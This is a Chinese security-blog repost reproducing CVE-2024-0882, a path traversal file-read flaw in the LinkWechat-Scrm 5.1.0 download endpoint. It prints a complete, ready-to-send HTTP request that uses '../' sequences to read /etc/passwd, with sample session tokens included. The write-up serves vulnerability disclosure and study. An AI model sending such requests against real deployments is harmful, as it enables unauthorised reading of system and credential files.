[漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取

admin 2024年1月28日12:03:01评论84 views字数 2226阅读7分25秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

LinkWeChat 是基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。
LinkWeChat 基于企业微信开放能力,不仅集成了企微强大的后台管理及基础的客户管理功能,而且提供了多种渠道、多个方式连接微信客户。并通过客情维系、聊天增强等灵活高效的客户运营模块,让客户与企业之间建立强链接,从而进一步通过多元化的营销工具,帮助企业提高客户运营效率,强化营销能力,拓展盈利空间。
主要运用于电商、零售、教育、金融、政务等服务行业领域。

开发语言:Java官网地址:https://www.linkwechat.net/项目地址:https://github.com/qwdigital/LinkWechat-Scrm

[漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取

空间测绘

回复“CVE-2024-0882”获取空间测绘语句

漏洞描述

qwdigital LinkWechat 5.1.0 中发现漏洞。它已被归类为有问题的。这会影响组件通用下载接口的文件 /linkwechat-api/common/download/resource 的未知部分。使用输入 /profile/../../../../../etc/passwd 操作参数名称会导致路径遍历,可以远程发起攻击。
影响版本

qwdigital LinkWechat 5.1.0
漏洞利用

需要登录任一用户

GET /linkwechat-api/common/download/resource?name=/profile/../../../../../etc/passwd HTTP/1.1Host: xxx.xxx.xxxConnection: closesec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiNGI4NmUzM2QtZmYyNC00YWNjLTkwMzEtMDhlZTQ3YWI3NmFkIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.ZYXfC0WL_RTueRE4qQVEO4C_3lF97_iUcgDbBx_muI8ev2ZA5DO7DSNFzXIky77lDKhjRs0grtEhR78v-Hhc8Aauthorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiNGI4NmUzM2QtZmYyNC00YWNjLTkwMzEtMDhlZTQ3YWI3NmFkIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.ZYXfC0WL_RTueRE4qQVEO4C_3lF97_iUcgDbBx_muI8ev2ZA5DO7DSNFzXIky77lDKhjRs0grtEhR78v-Hhc8Asec-fetch-user: ?1

[漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2024-0882https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md

原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月28日12:03:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] CVE-2024-0882 LinkWechat-Scrm 任意文件读取https://cn-sec.com/archives/2438942.html

发表评论

匿名网友 填写信息